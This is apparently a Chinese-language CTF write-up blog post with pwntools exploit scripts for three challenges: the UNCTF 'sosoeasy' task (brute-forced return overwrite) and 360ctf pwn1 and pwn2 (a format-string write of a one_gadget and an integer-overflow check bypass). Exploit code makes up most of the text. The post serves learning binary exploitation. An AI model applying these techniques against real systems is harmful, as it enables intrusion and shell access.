登录后台

页面导航

本文编写于 377 天前,最后修改于 119 天前,其中某些信息可能已经过时。

unctf

sosoeasy

from pwn import * 
import binascii 
context.log_level = 'debug' 
elf = ELF('./x86_libc.so.6') 
offset = 12 
i = 0 
while True:     
    i += 1         
    print i         
    sh = process('./pwn')     
    #sh = remote('101.71.29.5',10000)         
    sh.recvuntil('the ')     
    #sh.recvuntil('\x32')     
    base = int(sh.recv(5)) << 16    
    print hex(base)     
    sh.recvuntil('name?\n')         
    payload = 'a'*offset     
    #addr = base + random.sample(list1,1)[0]         
    payload += p32(base+0x 59d6)     
    sh.send(payload)     
    sh.recvuntil('(1.hello|2.byebye):\n')     
    sh.send('0')     
    try:                 
        sh.recv(timeout = 1)              
    except Exception as e:         
        sh.close()         
        continue     
    else:         
        sleep(0.1)         
        sh.interactive()

360ctf pwn1

程序分析

    Arch:     i386-32-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

难点在于:

  1. 限制了输入次数为3次,每次长度为16字节
  2. 格式化字符串在.bss段上

攻击思路主要是先突破输入次数限制,再寻找合适的跳板覆盖返回地址为one_gadget

漏洞利用

from pwn import *
context.log_level   = 'debug'
p = process('./fmt')

gadgets =[0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]

def HL(value):
    lis = []
    high = value >> 16
    low = value & 0xffff
    lis.append(low)
    lis.append(high)
    return lis

def input(payload):
    p.recvuntil("2. Exit")
    p.send('1')
    p.recvuntil("something")
    p.sendline(payload)

def exit():
    p.recvuntil("2. Exit")
    p.send('2')

## leak address
input("%5$p%12$p%15$p")
p.recvline()
leaked = p.recvline()
bin_base = int(leaked[2:10], 16) - 0x1fb8
stack_addr = int(leaked[12:20], 16)
var_addr = stack_addr - 0x2C + 0x3
target_addr = stack_addr - 0x4
libc_base = int(leaked[22:30],16) - 247 - 0x18540
shell_addr = libc_base + gadgets[1]
bp = bin_base + 0x81c
#gdb.attach(p,'b *' + str(hex(bp)))
log.info("binary_base address is %x" % bin_base)
log.info("stack address is %x" % stack_addr)
log.info("libc_base address is %x" % libc_base)
log.info("var address is %x" % var_addr)
log.info("target address is %x" % target_addr)

## Modify var i values
lis = HL(var_addr)
input("%" + str(lis[0])  + "c%21$hn")
input("%255d%57$hhn")

## Write one_gadget at ret_addr through the target_addr
lis = HL(target_addr)
input("%" + str(lis[0])  + "c%21$hn")
lis = HL(target_addr+2)
input("%" + str(lis[0])  + "d%22$hn")

lis = HL(shell_addr)
input("%" + str(lis[0])  + "c%57$hn")
input("%" + str(lis[1])  + "c%59$hn")

exit()
p.interactive()

360ctf pwn2

程序分析

绕过两个判断就能拿到flag
(1)判断1:x1和y1都是有符号整数,令y1为负就可以绕过判断
考察点:整数范围
(2)判断2:int类型大小为4个字节,通过eax传递,只要两个数相乘等于0x100000168,超过其表示范围就可以绕过

漏洞利用

exp:

from pwn import *
#context.log_level = 'debug'

p = process("./pwn1")
#p = remote("localhost",12345)

if __name__=='__main__':
    p.recvuntil("x:")
    p.sendline(str(359))
    p.recvuntil("y:")
    p.sendline(str(2**32-1))
    p.recvuntil("Please input x and y:")
    #gdb.attach(p)
    p.sendline(str(0x0000000100000008)+" "+str(0x0000000100000168/8))
    p.interactive()